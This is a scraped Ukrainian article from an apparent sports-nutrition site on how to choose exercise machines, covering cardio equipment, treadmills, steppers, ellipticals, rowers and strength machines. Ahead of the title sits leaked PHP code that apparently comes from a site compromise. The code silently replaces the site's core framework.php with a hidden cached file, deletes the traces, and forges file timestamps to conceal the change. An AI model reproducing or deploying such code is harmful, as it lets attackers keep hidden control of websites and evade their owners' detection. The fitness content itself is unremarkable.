$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Як потрібно вибирати тренажер | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Як потрібно вибирати тренажер

Тренажери можна умовно розділити на два види: що підвищують витривалість (кардіо-тренажери) і що розвивають силу (силові тренажери). До першого відносяться бігові доріжки, велотренажери, степпери, еліптичні тренажери гребні тренажери. Силові тренажери представлені лавами, тренажерами, де в якості навантаження використовується вага спортсмена й комплексами з вільними й вбудованими вагами. Звичайно, таке розділення не є абсолютним: заняття на будь-якому виді тренажерів розбудовують і силу, і витривалість, але в різному ступені.

Кардіо-тренажери

Кардіо-тренажери в першу чергу призначені для зміцнення серцево-судинної й дихальної систем організму. Тому основне, за чим прийдеться стежити під час занять - це показання пульсу. Справа в тому, що максимальний ефект від тренування досягається на кардіотренажері в так званій "аеробній зоні". Аеробна зона - це частота пульсу рівна 60-80 відсоткам від максимальної величини пульсу, яку можна розрахувати по формулі 220 мінус вік. Як правило, спалювання жиру відбувається при пульсі, що становить від 60 до 70 відсотків, ріст і зміцнення м'язів - при 70-80 відсотках від максимальної частоти. Значення пульсу залежать від рівня підготовленості. Прийнято вважати, що на початковому рівні пульс під час занять повинен становити 60-65 відсотків від максимальної частоти, на середньому - 65-70 відсотків, на більш продвинутому рівні - 70-75 відсотків. Довідатися свій пульс під час занять просто: зараз уже практично всі кардіотренажери облаштовані різними датчиками для виміру пульсу. Існують датчики- кліпси на вухо (найпростіший спосіб виміру пульсу й тому має більшу погрішність), датчики на рукоятках тренажера (більш точні й зручні у використанні) і нагрудні кардіодатчики (вони дають найточніші показання).

Велотренажери

Самий популярний вид тренажерів. Вони прекрасно розвивають витривалість, зміцнюють серцево-судинну систему, при цьому тренують м'язи ніг і спини. На бортовому комп'ютері можна стежити за дистанцією, швидкістю й пульсом. Серед велотренажерів можна виділити дві основні групи - механічні й магнітні. Залежно від способу регулювання навантаження механічні діляться на ремінні (навантаження залежить від натягу ременя і його тертя про колесо- маховик) і колодкові (їх дія заснована на опорі гальмових колодок, що притискаються до маховика). Кожна із систем має свої переваги: ремінні велотренажери коштують дешевше й більш компактні; колодкові мають велику інерційність і прекрасно імітують їзду на гоночному велосипеді; магнітні - безшумні й мають більш рівномірний хід. Самі найпростіші - велосипеди з ремінним навантаженням. Вони мають мінімальний набір функцій, достатніх для повноцінного тренування: бортовий комп'ютер, датчики для виміру пульсу і т.д. Ціна ремінних тренажерів не буде вище 200 доларів. У моделей з магнітною системою навантаження регулюється за допомогою зміни відстані між постійними магнітами й маховиком. Ціна в основному залежить від електроніки й маси маховика (чим маховик масивніше, тим плавніше буде обертання педалей). Велотренажери більш просунутого рівня (від $400) мають вбудовані програми тренування. Програми, розроблені спортивними фахівцями, пропонують уже готовий формат тренування, розрахований на будь-який рівень підготовленості й будь-яку мету - будь то спалювання жиру або тренування серцево-судинної системи. В одному тренажері може бути до 12 таких програм.Дорожче ( від 1500 $) коштують велотренажери з пульсозалежними програмами, що автоматично регулюють навантаження залежно від значення пульсу. Клас найдорожчих тренажерів характеризується інтерактивністю найвищого рівня. Такі велотренажери можуть запропонувати практично все: від участі в комп'ютерній грі до практичних рад "професійного тренера". Усі машини цього рівня мають функцію затримки Cool Dawn (наприкінці тренування комп'ютер сповільнює темп, щоб пульс спортсмена відновився до нормального рівня) і систему Quick Start (дозволяє швидко почати тренування в режимі ручного керування натисканням однієї клавіші).Особливий клас велотренажерів - велоергометри (від $1000). Це тренажери більш складного технічного рівня. Вони відрізняються від звичайних велотренажерів тим, що навантаження на них має чітко певні значення - Вати. Це дозволяє точно підібрати навантаження залежно від рівня підготовленості користувача й цілей занять. Тому велоергометри широко використовуються в терапевтичних і реабілітаційних цілях.

Бігові доріжки

На сьогоднішній день це самий популярний вид тренажерів. Заняття на бігових доріжках вважаються одним з найефективніших методів спалювання жиру. Багато в чому це пояснюється фізіологічними причинами: під час бігу спортсмен переносить масу власного тіла в просторі, що максимально прискорює обмінні процеси, спалюючи зайві калорії й зміцнюючи організм. Існує два види бігових доріжок: механічні електричні. Механічні - найпростіші й дешеві (ціни на них не перевищує $400). Такі бігові доріжки не вимагають підключення до мережі, тому що бігове полотно приводить у рух сам спортсмен. Однак, якщо бігун втомиться, ефективність тренування різко впаде, адже крутити полотно він стане набагато повільніше. На електричних бігових доріжках заняття будуть більш плідні. Навантаження регулюється двома способами: зміною кута нахилу бігового полотна й швидкості його руху. Це можна робити вручну, або за допомогою пульсозалежної програми. Такими програмами зараз оснащені практично всі сучасні моделі. Рівень бігової доріжки (а відповідно й ціна) залежить від потужності двигуна, розміру бігового полотна (який визначає не тільки комфорт, але і потужності бігової доріжки) і максимальна вага користувача, яку доріжка зможе витримати. Ціна буде залежати й від максимальної межі швидкості тренажера й кута нахилу бігового полотна. При виборі бігової доріжки важливо звернути увагу на наявність амортизації. Система амортизації знижує ударне навантаження, шкідливу для хребта й суглобів. Більш дорогі доріжки (від $1100) мають вже вбудовані програми тренування. Наступний клас бігових доріжок (від $2000) крім іншого оснащені і пульсозалежними програмами, що автоматично регулюють навантаження залежно від показань пульсу. Американська фірма Icon Health and Fitness випускає бігові доріжки марок PRO FORM і Nordic Track оснащені функцією ifit.com. Під час занять можна використовувати спеціальні компакт-диски й відеокасети із програмами різних тренувань (наприклад, для спалювання жиру або тренування серцево-судинної системи). Усі інтерактивні програми ifit.com мають кілька рівнів складності й різноманітне музичне й відео супровід. Підключивши доріжку до телевізора або СD-програвачу, спортсмен зможе займатися з персональним тренером. На диску й відеокасеті тренажера записані спеціальні сигнали, за допомогою яких тренер може подавати команди біговій доріжці. Підкоряючись "розпорядженням" тренера, доріжка самостійно буде регулювати швидкість і кут нахилу полотна, змінюючи, таким чином, навантаження. Крім цього, займаючись за допомогою відеоваріанта програми, користувач зможе "бігати" не в малогабаритній кімнаті, а по мальовничих лугах або труднопрохідних гірських стежках.

Степпери

Вони успішно виконують не тільки загальні для усіх кардіо-тренажерів функції, але й найбільше активно тренують м'яза ніг і таза. Існує два види степперів: з регульованим і нерегульованим навантаженням. Останні - міністеппери - складаються з одних педалей і лічильника кроків і часу. У більш дорогих степперах є комп'ютер, що регулює навантаження, вимірює пульс, задає частоту кроків і їх ритм. У таких тренажерах є поручні або важелі для рук, що навантажують верхній плечовий пояс.

Еліптичні тренажери

Це один з новітніх видів спортивного устаткування. По ступеню ефективності еліптичні тренажери можна зрівняти з біговими доріжками.Крос- Тренінг (ходьба по еліптичній траєкторії) поєднує в собі тренування серцево-судинної й дихальної систем, а також елементи силового тренування для верхньої частини тіла. Уважається, що такий "елліпсовидний крок" цілеспрямовано задіє різні проблемні зони й особливо - м'язи ніг, сідниць і стегон. При цьому заняття на еліптичних тренажерах абсолютно нешкідливі для суглобів. Конструкція дозволяє паралельно займатися тренуванням м'язів груди, рук і спини. На комп'ютері еліптичного тренажера теж можна задавати дистанцію, час тренування, оптимальне значення пульсу. Ціна такого тренажера залежить від маси маховика, максимальної ваги користувача, яка зможе витримати машина й вбудованих програм. Найпростіші коштують від 400 до 700 доларів. У дорогих моделях (від $2000) є весь спектр інтерактивних функцій.

Гребні тренажери

Самий універсальний вид тренажера. Він ефективний для розвитку й витривалості, і сили. При тренуваннях у "весляра" працюють практично всі м'язи тіла (ніг, рук, сідниць, преса, спини й грудей). Навантаження може регулюватися декількома способами: механічним (можна змінити довжину "весел" або розворот лопат) і магнітним (змінюється опір магнітної системи). 400-600 доларів буде коштувати тренажер з найпростішим комп'ютером, що показує час тренування, пройдену дистанцію й витрату калорій. Тренажери більш високого рівня (близько $1000) мають спеціальну конструкцію, що дозволяє використовувати їх як багатофункціональні силові комплекси. На них можна виконувати безліч вправ. Найдорожчі коштують від $2000. Це вже практично професійна техніка. Наприклад, гребний тренажер Concept-ii використовують під час тренувань професійні спортсмени. Такі тренажери оснащені не тільки вбудованими програмами тренування, але й можуть підключатися до комп'ютера. Завдяки цьому можна не тільки аналізувати результати тренування, але й за допомогою інтернету брати участь у віртуальних змаганнях з іншими користувачами.

Силові тренажери

Під власною вагою
Це новий тип силових тренажерів, що використовують вагу спортсмена як основного навантаження. З їхньою допомогою добре розвивається сила, витривалість і гнучкість. Рівень навантаження можна змінити, відрегулювавши кут нахилу лави або за рахунок використання додаткових млинців.
З вільними вагами
Серйозні атлети бажають тренуватися з вільними навантаженнями: млинцями, грифами й гантелями. Так можна не тільки швидше наростити м'язову масу, але й покращити координацію рухів, тому що спортсмену увесь час потрібно стежити за збереженням рівноваги й за положенням снаряда. Тренажери з вільними вагами ділять на агрегати, що навантажуються ваговими дисками, і для роботи зі штангами й гантелями. При виборі тренажера для роботи з вільними обтяженнями потрібно в першу чергу звернути увагу на надійність конструкції й максимальна вага, яка можуть витримати стійки під штангу. Також важлива ширина між стійками й можливість регулювати їхню висоту.
Із вбудованими вагами
Тренажери із вбудованими вагами підійдуть тим, хто тільки почав займатися: вони більш безпечні й дозволяють працювати над конкретною групою м'язів, не втягуючи в процес інші мязи. У якості навантажень тут використовують плоскі вантажі, утримувані в стеці фіксаторами, що й пересуваються по стрижню. Ці тренажери сконструйовані таким чином, щоб автоматично підлаштовуються під мінливу силу скорочення м'язів за рахунок використання кулачкових або важільних механізмів.

 
Статті ТРЕНАЖЕРИ Як потрібно вибирати тренажер